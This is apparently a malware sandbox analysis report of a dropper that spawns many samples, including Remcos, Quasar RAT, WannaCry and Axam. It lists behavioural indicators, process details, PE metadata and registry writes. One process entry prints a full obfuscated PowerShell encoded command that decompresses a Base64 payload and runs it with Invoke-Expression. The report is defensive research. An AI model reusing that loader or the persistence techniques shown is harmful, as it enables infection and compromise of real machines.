  - powershell.exe (PID: 15136)
  - powershell.exe (PID: 15328)
  - powershell.exe (PID: 7632)
  - powershell.exe (PID: 7660)
  - powershell.exe (PID: 15668)
  - powershell.exe (PID: 16056)
  - WerFault.exe (PID: 7684)
  - powershell.exe (PID: 1212)
  - powershell.exe (PID: 11564)
  - powershell.exe (PID: 7108)
  - powershell.exe (PID: 13336)
  - powershell.exe (PID: 9960)
  - powershell.exe (PID: 12512)
  - powershell.exe (PID: 13556)
  - dw20.exe (PID: 7664)
- Process checks computer location settings
  - donie30.exe (PID: 684)
  - bravo29.exe (PID: 7248)
  - Setup.exe (PID: 9444)
  - test1.exe (PID: 9436)
  - lol.exe (PID: 11928)
  - hersey.exe (PID: 11632)
  - remcos_a.exe (PID: 12348)
  - Crypt.exe (PID: 7256)
  - discord.exe (PID: 12752)
  - 4De3.exe (PID: 12168)
  - %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10860)
  - your_app.exe (PID: 12364)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - cabal.exe (PID: 11608)
  - quasarat.exe (PID: 12440)
  - ap.exe (PID: 8948)
  - epic.exe (PID: 15268)
  - ganja5.exe (PID: 12704)
  - quasarat.exe (PID: 7500)
  - Helper.exe (PID: 7784)
  - dw20.exe (PID: 7664)
  - quasarat.exe (PID: 16088)
- Process checks whether UAC notifications are on
  - my%20file.exe (PID: 2180)
- Launching a file from a Registry key
  - loader.exe (PID: 8524)
  - explorer.exe (PID: 9696)
  - WindowsUpdateLauncher.exe (PID: 9408)
  - syspool.exe (PID: 10340)
  - runtimebroker.exe (PID: 10316)
  - msconfig.exe (PID: 3584)
  - remcos_a.exe (PID: 12348)
  - {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 11840)
  - WannaCry.exe (PID: 12312)
  - klass.exe (PID: 9172)
  - ls.exe (PID: 12144)
  - Amus.exe (PID: 10348)
  - Axam.a.exe (PID: 640)
  - Adobe.exe (PID: 10656)
  - hersey.exe (PID: 11632)
  - sFFG7Wg.exe (PID: 3880)
  - Axam.exe (PID: 8716)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - Axam.exe (PID: 7236)
  - Axam.exe (PID: 9360)
  - quasarat.exe (PID: 12440)
  - Axam.exe (PID: 9452)
  - Axam.exe (PID: 12536)
  - Axam.exe (PID: 7600)
  - Axam.exe (PID: 10648)
  - Axam.exe (PID: 1932)
  - Axam.exe (PID: 13752)
  - Axam.exe (PID: 13840)
  - Axam.exe (PID: 13628)
  - ganja5.exe (PID: 12704)
  - reg.exe (PID: 11488)
  - Axam.exe (PID: 11620)
  - Axam.exe (PID: 14868)
  - Axam.exe (PID: 5540)
  - reg.exe (PID: 11028)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 14196)
  - quasarat.exe (PID: 7500)
  - Axam.exe (PID: 12476)
  - Axam.exe (PID: 15188)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 10536)
  - installer.exe (PID: 10332)
  - Axam.exe (PID: 15584)
  - Axam.exe (PID: 15924)
  - Axam.exe (PID: 12668)
  - Axam.exe (PID: 15972)
  - Axam.exe (PID: 12180)
  - Axam.exe (PID: 15532)
  - Axam.exe (PID: 15988)
  - Axam.exe (PID: 1760)
  - quasarat.exe (PID: 16088)
  - werefult.exe (PID: 10260)
- Reads Environment values
  - TempSpoofer.exe (PID: 1128)
  - TempSpoofer.exe (PID: 4044)
  - Monotone.exe (PID: 6892)
  - Monotone.exe (PID: 1036)
  - TempSpoofer.exe (PID: 6292)
  - TempSpoofer.exe (PID: 1392)
  - runtimebroker.exe (PID: 10316)
  - WindowsUpdateLauncher.exe (PID: 9408)
  - Helper.exe (PID: 7784)
  - UniversalSpoofer.exe (PID: 8044)
  - startud.exe (PID: 8588)
  - ganja5.exe (PID: 12704)
  - c1.exe (PID: 12380)
  - MSBuild.exe (PID: 8500)
  - installs.exe (PID: 7988)
  - dw20.exe (PID: 7664)
- Launching a file from the Startup directory
  - explorer.exe (PID: 9696)
  - Bloxflip%20Predictor.exe (PID: 11640)
  - Axam.a.exe (PID: 640)
- Reads Internet Explorer settings
  - mshta.exe (PID: 8940)
  - mshta.exe (PID: 10252)
  - mshta.exe (PID: 9932)
  - mshta.exe (PID: 9844)
- Disables trace logs
  - mexx.exe (PID: 8964)
  - VXHDH.exe (PID: 1612)
  - cabal.exe (PID: 11608)
  - quasarat.exe (PID: 12440)
  - MARCUSS.exe (PID: 12728)
  - ganja5.exe (PID: 12704)
  - installs.exe (PID: 7988)
  - powershell.exe (PID: 9760)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 10364)
  - powershell.exe (PID: 10396)
  - quasarat.exe (PID: 7500)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
  - powershell.exe (PID: 9324)
  - quasarat.exe (PID: 16088)
- Creates files in the program directory
  - Ganja99.exe (PID: 1760)
  - Ganja90.exe (PID: 11624)
  - remcos_a.exe (PID: 12348)
  - MSBuild.exe (PID: 8500)
  - ganja5.exe (PID: 12704)
  - WannaCry.exe (PID: 12312)
  - dw20.exe (PID: 7664)
- PyInstaller has been detected (YARA)
  - main.exe (PID: 7100)
- Manual execution by a user
  - netsh.exe (PID: 11220)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 6572)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 10276)
  - powershell.exe (PID: 10356)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 10388)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 6164)
  - powershell.exe (PID: 10480)
- Checks whether the specified file exists (POWERSHELL)
  - Helper.exe (PID: 7784)
  - powershell.exe (PID: 9604)
- Reads CPU info
  - MSBuild.exe (PID: 8500)
  - ganja5.exe (PID: 12704)
  - dw20.exe (PID: 7664)
- Reads product name
  - MSBuild.exe (PID: 8500)
  - dw20.exe (PID: 7664)
- Found Base64 encoded access to UAC via PowerShell (YARA)
  - cmd.exe (PID: 2804)
- Changes the display of characters in the console
  - cmd.exe (PID: 9656)
  - cmd.exe (PID: 8580)
  - cmd.exe (PID: 2116)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 9672)
  - powershell.exe (PID: 8284)
  - powershell.exe (PID: 11492)
  - powershell.exe (PID: 13360)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 13984)
  - powershell.exe (PID: 10396)
  - powershell.exe (PID: 10364)
  - powershell.exe (PID: 15136)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 9600)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 6512)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6164)
  - powershell.exe (PID: 10716)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 7632)
  - powershell.exe (PID: 15328)
  - powershell.exe (PID: 7660)
  - powershell.exe (PID: 15668)
  - powershell.exe (PID: 16056)
  - powershell.exe (PID: 11564)
  - powershell.exe (PID: 15808)
  - powershell.exe (PID: 1212)
  - powershell.exe (PID: 7108)
  - powershell.exe (PID: 13336)
  - powershell.exe (PID: 10388)
  - powershell.exe (PID: 12512)
  - powershell.exe (PID: 9960)
  - powershell.exe (PID: 13556)
- Application launched itself
  - chrome.exe (PID: 7504)
  - chrome.exe (PID: 15064)
  - chrome.exe (PID: 15212)
  - chrome.exe (PID: 13792)
  - chrome.exe (PID: 15636)
  - chrome.exe (PID: 16048)
  - chrome.exe (PID: 11392)
  - chrome.exe (PID: 16192)
  - chrome.exe (PID: 15576)
  - chrome.exe (PID: 14752)
  - chrome.exe (PID: 12276)
  - chrome.exe (PID: 12004)
  - chrome.exe (PID: 7468)
- The executable file from the user directory is run by the Powershell process
  - Axam.exe (PID: 5540)
  - Axam.exe (PID: 12880)
  - Axam.exe (PID: 13128)
  - Axam.exe (PID: 14196)
  - Axam.exe (PID: 12476)
  - Axam.exe (PID: 15188)
  - Axam.exe (PID: 12928)
  - Axam.exe (PID: 14444)
  - Axam.exe (PID: 10536)
  - Axam.exe (PID: 15972)
  - Axam.exe (PID: 15924)
  - Axam.exe (PID: 15584)
  - Axam.exe (PID: 12668)
  - Axam.exe (PID: 12180)
  - Axam.exe (PID: 15532)
  - Axam.exe (PID: 15988)
- Converts byte array into ASCII string (POWERSHELL)
  - powershell.exe (PID: 9324)
- Uses string split method (POWERSHELL)
  - powershell.exe (PID: 12388)
  - powershell.exe (PID: 10364)
- Checks if a key exists in the options dictionary (POWERSHELL)
  - powershell.exe (PID: 9324)
  - powershell.exe (PID: 9604)
  - powershell.exe (PID: 9012)
  - powershell.exe (PID: 9956)
  - powershell.exe (PID: 12812)
  - powershell.exe (PID: 9600)
  - Helper.exe (PID: 7784)
  - powershell.exe (PID: 8160)
  - powershell.exe (PID: 7452)
  - powershell.exe (PID: 6164)
  - powershell.exe (PID: 6512)
- Uses string replace method (POWERSHELL)
  - powershell.exe (PID: 10364)
- Reads Windows Product ID
  - powershell.exe (PID: 9324)
- Manages system restore points
  - SrTasks.exe (PID: 13968)
- Executable content was dropped or overwritten
  - msiexec.exe (PID: 11180)
- Launching a file from Task Scheduler
  - cmd.exe (PID: 15300)
- Changes the registry key values via Powershell
  - werefult.exe (PID: 10260)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (87.3)
.exe	\|	Generic Win/DOS Executable (6.3)
.exe	\|	DOS Executable Generic (6.3)

EXIF

EXE

MachineType:	AMD AMD64
TimeStamp:	2025:06:19 18:59:12+00:00
ImageFileCharacteristics:	Executable, Large address aware
PEType:	PE32+
LinkerVersion:	14.43
CodeSize:	178688
InitializedDataSize:	154624
UninitializedDataSize:	-
EntryPoint:	0xc380
OSVersion:	6
ImageVersion:	-
SubsystemVersion:	6
Subsystem:	Windows command line

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

603

Monitored processes

463

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

236

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

schtasks.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

640

Axam.a.exe

C:\Users\admin\AppData\Local\Temp\a\Axam.a.exe

main.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Version:

1.00

Modules

Images
c:\users\admin\appdata\local\temp\a\axam.a.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvbvm60.dll

684

donie30.exe

C:\Users\admin\AppData\Local\Temp\a\donie30.exe

main.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\a\donie30.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll

684

baboon.exe

C:\Users\admin\AppData\Local\Temp\a\baboon.exe

main.exe

User:

admin

Integrity Level:

HIGH

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\a\baboon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll

888

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

SrTasks.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

1036

Monotone.exe

C:\Users\admin\AppData\Local\Temp\a\Monotone.exe

—

main.exe

User:

admin

Integrity Level:

HIGH

Description:

Version:

0.0.0.0

Modules

Images
c:\users\admin\appdata\local\temp\a\monotone.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

1068

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

1128

TempSpoofer.exe

C:\Users\admin\AppData\Local\Temp\a\TempSpoofer.exe

—

main.exe

User:

admin

Integrity Level:

HIGH

Description:

Version:

0.0.0.0

Modules

Images
c:\users\admin\appdata\local\temp\a\tempspoofer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

1212

C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "JAB7ADAAeAAxAGEAMgBiADMAYwB9AD0AWwBTAHkAcwB0AGUAbQAuAFIAYQBuAGQAbwBtAF0AOgA6AG4AZQB3ACgAKQA7ACQAewAwAHgANABkADUAZQA2AGYAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwANgA4ACwAOQA3ACwAMQAxADYALAAxADAAMQApAC0AagBvAGkAbgAnACcAKQA6ADoAbgBlAHcAKAApADsAJAB7ADAAeAA3AGcAOABoADkAaQB9AD0AJABuAHUAbABsADsAJAB7ADAAeABqADAAawAxAGwAMgB9AD0AQAAoACkAOwAkAHsAMAB4AG0AMwBuADQAbwA1AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMQAxACwAOQA4ACwAOQA5ACwAOQA3ACwAMQAxADYALAAxADAANQAsADEAMQAxACwAMQAxADAAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AHAANgBxADcAcgA4AH0APQAxAC4ALgAxADAAfAAmACgAWwBjAGgAYQByAFsAXQBdACgANwAwACwAMQAxADEALAAxADEANAAsADYAOQAsADkANwAsADkAOQAsADEAMAA0ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkALQBqAG8AaQBuACcAJwApAHsAJAB7ADAAeAAxAGEAMgBiADMAYwB9AC4ATgBlAHgAdAAoACkAfQA7ACQAewAwAHgAcwA5AHQAMAB1ADEAfQA9ACYAKABbAGMAaABhAHIAWwBdAF0AKAA3ADEALAAxADAAMQAsADEAMQA2ACwANAA1ACwAOAAwACwAMQAxADQALAAxADEAMQAsADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQApAC0AagBvAGkAbgAnACcAKQB8ACYAKABbAGMAaABhAHIAWwBdAF0AKAA4ADMALAAxADAAMQAsADEAMAA4ACwAMQAwADEALAA5ADkALAAxADEANgAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApAC0AagBvAGkAbgAnACcAKQAtAEYAaQByAHMAdAAgADMAOwAkAHsAMAB4AHYAMgB3ADMAeAA0AH0APQBbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEcAZQB0AFQAbwB0AGEAbABNAGUAbQBvAHIAeQAoACQAZgBhAGwAcwBlACkAOwAkAHsAMAB4AHkANQB6ADYAYQA3AH0APQAoAFsAYwBoAGEAcgBbAF0AXQAoADEAMAA5ACwAMQAxADEALAAxADEANAAsADEAMAAxACwAMQAwADYALAAxADEANwAsADEAMQAwACwAMQAwADcAKQAtAGoAbwBpAG4AJwAnACkAOwAkAHsAMAB4AGIAOABjADkAZAAwAGUAMQB9AD0AQAB7AGYAYQBrAGUAPQAnAGQAYQB0AGEAJwA7AG0AbwByAGUAPQAnAHMAdAB1AGYAZgAnAH0AOwAkAGEAPQAxADYAMQA5ADIAOwAkAGIAPQAnAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAARABDAEEAOAAuAHQAbQBwACcAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AKABuAEUAdwAtAG8AQgBqAEUAQwBUACAAcwB5AHMAdABFAG0ALgBJAG8ALgBDAG8AbQBQAFIARQBTAHMASQBPAG4ALgBEAEUAZgBsAGEAVABlAHMAVABSAEUAYQBNACgAWwBpAE8ALgBtAGUATQBPAFIAeQBzAHQAUgBFAGEATQBdAFsAYwBPAG4AdgBFAHIAdABdADoAOgBmAHIAbwBNAEIAQQBTAEUANgA0AHMAdAByAGkAbgBHACgAJwByAFYAWABmAGIAOQBvAHcARQBIADcAUABYACsARQB4AEgAaABMAEoAbwBBAHoAUQBmAGgAUgBGAEsAZwAzAHQAVgBxAG4AVABPAG0AQgBiAFYAOABTAEQAUwBRADQAUwB6AGIARQBqAHgANABHAHcAdwB2ADgAKwBKAHoARQB0AGEAYgBPAHAAVgBQAE0ARAB2AG8AdAA5ADkAOQAzAEgAZAB5AGUALwBSAGoAOQBYAHEANgArAEwAVwArAHEAdgBQAHIAdwB6AG0AbwBrAGsAUQBrADcAQwBDAEoAQwBEAFAAbwBKAHMARABZAGsARQB3ACsAZgBvAHoAawBCAHEATgBiADEAVQBDAEcAQgBQAEwAaABSAG4AUQBFAG0AYwBnAEsAKwArAG0ANQBWADcATABmAFMAUQAxAFcAcABQAHUAQwBSADAARABCADUAbgBmAG0ATABzADAARABvAEkASwBhAGkAQQBmAFgAQwBMAFMAdABTADEARABHAFAAZwArADYAMwBKAEoAbABiAFIAKwBlADgAUQBGAGkARQBMAFoAYwBnAFoATwBtADAAWQBhAFIASwB5AEoAUgBwAHYARQBnAGwAUgAvADkAQgBwAGoAMQBJAG0ARgBVAHIANwBrAGsAawBRAFAAQgA2AEQAVwBJAFUAZQBKAEgAMABqAFQAdQBjADAAOQBKAEIASABTAFoASwBnAG0ANQBLAE0ASwBpAEcAUgBLAEEAMgBaAFIAQQBQAEgAegBtAHoAYgA3AHUAQwB6ADMATwBqAFoATgBuAGIATABMACsALwB4AHMARABBADYATgBqADQAdgBqAEQAZAAyAHYAdwBpAGUARABpAG0AOQBqAEcASQB1AHAATgBuADQAQgBZAEkAQgA3AFgAWQBhADEAawB3AFIAbABRAG8ASABNAG8AWABQAGsAQwByAGoAVwBnAHIAMABKAFEAWgAyAEwAYgBnAHEASgBEAEUATAB1AEEAegBQAE8AYQBkAG8AZwB3AHYAdgB0ADMAVgBFAHkAaQBMAFEAcABUAHkAQgBUADQAVAA1AEYARQB5AE4AawBWAG4ASAAxAC8AVQA5AEYARABJAGwAZABFAEEAcAA5ADgANgB6ACsAMAB4AFkARwAvAHYAeQB5AG8AMgBVADIALwB6AG8AWQBuACsASQBVAEkASwBtAC8AeABrAGkATABqAFkAMQBTAFAATwBOAGgATwBuAHMAQQBZAHUAbgBXAHAAbgBqADgAVABRAHIAaABTAGoAQgBrADcAVwA4AHYAbQBuAHIAZgA4AEIAZAAwAEQAUQBKAEwAbABVAG4AaQBkAFQATABHADkAUQBsAFgAZwBEAC8AdwBuAHkAQgBVAEsANABBAE4AVwBVAGoAOQBlAGQASgBtAEEAVABLADgAZgA4AHUAbAB2AGIASgAzAHAAaQBYAEIAOQA3AGUAOQB6AFcAKwBuAGcAaQBOAFYAMQBBAFoAbABkADAAWgA3ADkAWAB3AHIAWABKAFEAOABxAFcAagBBACsAZQB3AG0AUQBmAGIAcwA2ADIANwBIAFcANwBQADgAWQBMAFEAQgBIAEMAcwBjACsAYwByAFgASgBpAEIANAA1AFIAaAA3AFYAcwAxAGoAWgBZAEEAbQBTAHAATwB4AGQAWAArADQAOABTAFIAOAA2AGcAYgBBADMAdwBRAGkANAB2AEsATABMADkAOQBCAFcAdwBwAEEAMgB4AG4AWABUAFcAYwBXAHoAdgByAHEARQAxADUAUABiAHUASwBIAEYAVwBSADcAdwA0AEgASgByAEQANgBsAFUAcAAyADkANABFAEYAZQA5ADUAWAA4AGEAKwBlAE4ARgBHAEEASQAyAHgAcQBEAFEALwByADYATgBsAEYAOAAzAEQAcgBLAEoAQgAxAEEAVgBJAHoARwBUAG0ATQAvADUAaAB0AEQAcgBCACsATgBrAEMAZQB1AGIANABwAGEAegBrADgATwA2ADgAVwBTAGoAbwAxADMAVgBnAFYAeQAxAFkANABWAGYAOQBRAGoASQBwAFEAOABrAFYAQwAxAGQAOQBTAFoASABWAGYANwBZAHkAZAAwAFQAaABGAHIAUwB2AEMAbABpAGwAWgBBAG4ATABIAEEAUgBHAHgAMABmAFMAZABxAGMAdgBaAEMAbwBTAGMAbgBaAHgAYwBDAEIANgBkAGsAUQBUAGUAOQBzAFoAUwBxAEUAZgBFAE4AUABQADMAVABKADEATAA5AFgASwBoADEAbwBpAHMAVQBYAE4AdQBXAGMAYgAwAFIAbAAwAGUAbQBkAE4AYwBsAEcANQBuADEAaQBTADQANgBWAHQALwBBAEEAPQA9ACcAKQAsAFsAcwB5AFMAVABlAE0ALgBJAG8ALgBDAE8AbQBQAHIAZQBTAHMAaQBPAE4ALgBjAE8AbQBwAHIAZQBTAFMAaQBPAE4ATQBvAGQAZQBdADoAOgBkAEUAQwBvAG0AcAByAGUAUwBTACkAfAAlAHsAbgBFAHcALQBvAEIAagBFAEMAVAAgAEkATwAuAHMAdABSAGUAYQBtAHIAZQBhAGQARQBSACgAJABfACwAWwBTAFkAUwBUAGUAbQAuAFQAZQB4AHQALgBlAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBzAGMAaQBJACkAfQB8ACUAewAkAF8ALgBSAGUAYQBEAFQATwBlAE4AZAAoACkAfQApACAA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

MSBuild.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows PowerShell

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll

1392

TempSpoofer.exe

C:\Users\admin\AppData\Local\Temp\a\TempSpoofer.exe

—

main.exe

User:

admin

Integrity Level:

HIGH

Description:

Version:

0.0.0.0

Modules

Images
c:\users\admin\appdata\local\temp\a\tempspoofer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

407 244

Read events

405 813

Write events

1 332

Delete events

Modification events


(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702BE
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000008023C
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(5116) Taskmgr.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:	delete value	Name:	Preferences
Value:
(PID) Process:	(3880) sFFG7Wg.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:	write	Name:	CachePrefix
Value:
(PID) Process:	(3880) sFFG7Wg.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(3880) sFFG7Wg.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:
(PID) Process:	(4772) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000202A6
Operation:	write	Name:	VirtualDesktop
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:	(5116) Taskmgr.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:	write	Name:	Preferences
Value: 0D00000060000000600000006800000068000000E3010000DC010000000001000000008000000080D8010080DF010080000100016B00000034000000130300008C020000E80300000000000000000000000000000F000000010000000000000058AAEE82F77F00000000000000000000000000002E0100001E0000008990000000000000FF00000001015002000000000D0000000000000098AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008B900000010000000000000000101001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF780000001E0000008C900000020000000000000001021200000000000400000000000000C8AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008D900000030000000000000000011001000000000200000000000000E8AAEE82F77F00000000000000000000FFFFFFFF320000001E0000008A90000004000000000000000008200100000000050000000000000000ABEE82F77F00000000000000000000FFFFFFFFC80000001E0000008E90000005000000000000000001100100000000060000000000000028ABEE82F77F00000000000000000000FFFFFFFF040100001E0000008F90000006000000000000000001100100000000070000000000000050ABEE82F77F00000000000000000000FFFFFFFF49000000490000009090000007000000000000000004250000000000080000000000000080AAEE82F77F00000000000000000000FFFFFFFF49000000490000009190000008000000000000000004250000000000090000000000000070ABEE82F77F00000000000000000000FFFFFFFF490000004900000092900000090000000000000000042508000000000A0000000000000088ABEE82F77F00000000000000000000FFFFFFFF4900000049000000939000000A0000000000000000042508000000000B00000000000000A8ABEE82F77F00000000000000000000FFFFFFFF490000004900000039A000000B0000000000000000042509000000001C00000000000000C8ABEE82F77F00000000000000000000FFFFFFFFC8000000490000003AA000000C0000000000000000011009000000001D00000000000000F0ABEE82F77F00000000000000000000FFFFFFFF64000000490000004CA000000D0000000000000000021508000000001E0000000000000010ACEE82F77F00000000000000000000FFFFFFFF64000000490000004DA000000E000000000000000002150800000000030000000A000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000008990000000000000FF00000001015002000000000400000000000000C8AAEE82F77F0000000000000000000001000000960000001E0000008D900000010000000000000001011000000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C900000020000000000000000021000000000000C0000000000000040ACEE82F77F0000000000000000000003000000640000001E00000094900000030000000000000001021000000000000D0000000000000068ACEE82F77F00000000000000000000FFFFFFFF640000001E00000095900000040000000000000000011001000000000E0000000000000090ACEE82F77F0000000000000000000005000000320000001E00000096900000050000000000000001042001000000000F00000000000000B8ACEE82F77F0000000000000000000006000000320000001E00000097900000060000000000000001042001000000001000000000000000D8ACEE82F77F0000000000000000000007000000460000001E00000098900000070000000000000001011001000000001100000000000000F8ACEE82F77F00000000000000000000FFFFFFFF640000001E0000009990000008000000000000000001100100000000060000000000000028ABEE82F77F0000000000000000000009000000040100001E0000008F900000090000000000000001011001000000000000000000000000000000000000000000